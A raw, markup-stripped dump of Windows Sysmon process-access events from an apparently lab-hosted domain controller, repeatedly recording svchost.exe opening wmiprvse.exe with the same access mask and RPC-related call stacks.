13:30:32.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.060{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 